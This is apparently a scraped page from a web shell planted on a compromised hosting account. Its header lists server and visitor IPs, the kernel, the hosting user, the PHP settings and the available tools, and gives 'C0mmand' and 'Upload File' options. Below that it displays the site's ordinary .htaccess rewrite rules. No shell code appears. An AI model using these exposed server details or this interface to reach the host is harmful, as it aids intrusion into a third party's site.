Server IP : 103.53.40.154 / Your IP : 3.16.82.208 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/bsaec.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
RewriteEngine On # for www. RewriteCond %{HTTP_HOST} !^www\. [NC] RewriteRule ^(.*)$ http://www.%{HTTP_HOST}/$1 [R=301,L] # for https enable RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] ErrorDocument 404 /404.html # Redirect .php to .html RewriteRule ^index\.html$ index.php [L] RewriteRule ^about\.html$ about.php [L] RewriteRule ^courses\.html$ courses.php [L] RewriteRule ^gallery\.html$ gallery.php [L] RewriteRule ^contact\.html$ contact.php [L] RewriteRule ^course/(.*)\.html$ sub-course.php/$1 [L] RewriteRule ^detail/(.*)\.html$ course-page.php/$1 [L] #for slug url # RewriteCond %{REQUEST_FILENAME} !-f # RewriteCond %{REQUEST_FILENAME} !-d # RewriteRule ^(.*)$ course-page.php/$1 [L] # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php73” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php73___lsphp .php .php7 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit